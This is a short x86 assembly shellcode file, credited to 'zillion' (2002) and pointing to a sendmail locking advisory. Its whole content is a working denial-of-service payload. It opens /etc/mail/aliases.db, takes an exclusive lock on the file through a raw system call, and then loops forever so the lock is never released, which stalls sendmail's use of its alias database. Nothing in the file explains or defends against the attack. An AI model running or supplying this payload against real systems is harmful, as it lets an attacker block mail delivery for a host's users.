;
; Safemode.org, written by zillion 2002/05/24
; http://www.snosoft.com  : zillion@snosoft.com
; http://www.sendmail.org/LockingAdvisory.txt
;


BITS 32

jmp short       callit

doit:

pop             esi
xor             eax,eax
mov             [esi + 20],al
push            eax
push            esi
mov             al,5
push            eax
int             0x80

push byte       0x2
push            eax
mov             al,131
push            eax
int             0x80

; Where going to stay forever ;-)

sub             cl,0x3
l00p:
js              l00p

callit:
call            doit

db              '/etc/mail/aliases.db'



